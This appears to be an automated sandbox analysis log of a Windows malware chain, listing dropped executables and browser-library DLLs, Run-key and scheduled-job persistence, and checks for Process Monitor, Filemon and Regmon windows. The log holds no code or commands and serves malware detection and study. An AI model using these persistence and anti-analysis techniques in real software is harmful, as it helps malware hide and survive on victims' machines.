Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\1000003002\ead6a72944.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Jump to dropped file
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ead6a72944.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba77748b9b.exe

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass

Creates job files (autostart)

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba77748b9b.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba77748b9b.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ead6a72944.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ead6a72944.exe

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_004195E0

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
